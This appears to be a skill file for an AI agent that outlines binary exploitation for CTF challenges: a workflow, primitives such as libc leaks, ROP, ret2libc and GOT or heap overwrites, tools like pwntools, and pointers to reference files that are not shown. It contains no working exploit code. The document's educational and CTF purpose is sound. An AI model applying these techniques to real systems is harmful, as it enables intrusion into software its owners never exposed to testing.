Pwn Exploit

Overview

This skill provides structured access to binary exploitation techniques organized by vulnerability type. It serves as a reference guide for developing exploits, understanding attack vectors, and navigating CTF-Wiki documentation.

Quick Start

Identify the vulnerability type in your target binary and navigate to the corresponding reference:

• Stack overflow → See Stack Overflow Reference
• Format string → See Format String Reference
• Heap corruption → See Heap Exploitation Reference
• Integer overflow → See Integer Overflow Reference

Exploitation Workflow

1. Vulnerability Analysis

Use static/dynamic analysis tools to identify:

• Memory corruption vulnerabilities
• Unsafe function calls
• Missing input validation
• Protection mechanisms (ASLR, NX, PIE, stack canary)

2. Technique Selection

Choose exploitation technique based on:

• Vulnerability type (stack overflow, heap overflow, format string, etc.)
• Available gadgets (ROP, ret2libc, system calls)
• Mitigations present (bypass NX with ROP, bypass ASLR with leaks)
• Constraints (limited buffer size, character restrictions)

3. Exploit Development

Follow reference documentation for specific technique:

• Understand the underlying mechanism
• Identify required primitives (read, write, execute)
• Build payload step by step
• Test and iterate

Common Exploit Primitives

Information Leak

• Libc leak: Use puts, printf, or write functions to leak libc addresses
• Binary leak: Leak PIE base using GOT entries
• Stack leak: Leak canary or stack addresses

Control Flow Hijack

• Ret2libc: Return to libc functions (system, execve)
• ROP: Chain ROP gadgets for arbitrary execution
• One-byte writes: Modify GOT entries, hook functions

Memory Write

• Arbitrary write: Use fastbin, unsorted bin, or format string writes
• Pointer hijacking: Overwrite function pointers, vtable pointers

Tool Integration

Common tools for exploitation development:

• pwntools: Python framework for exploit development
• ROPgadget: Find ROP gadgets in binaries
• one_gadget: Find execve("/bin/sh", ...) in libc
• checksec: Analyze binary protections

References

Detailed technique documentation is organized by category:

Category	Reference File
Stack Overflow	stack-overflow.md
Format String	format-string.md
Heap Exploitation	heap-exploitation.md
Integer Overflow	integer-overflow.md

When to Use This Skill

Use this skill when:

• Analyzing CTF challenges involving pwn vulnerabilities
• Developing binary exploits for Linux targets
• Learning exploitation techniques and understanding attack vectors
• Debugging memory corruption in vulnerable programs
• Bypassing security mitigations (ASLR, NX, PIE, stack canary)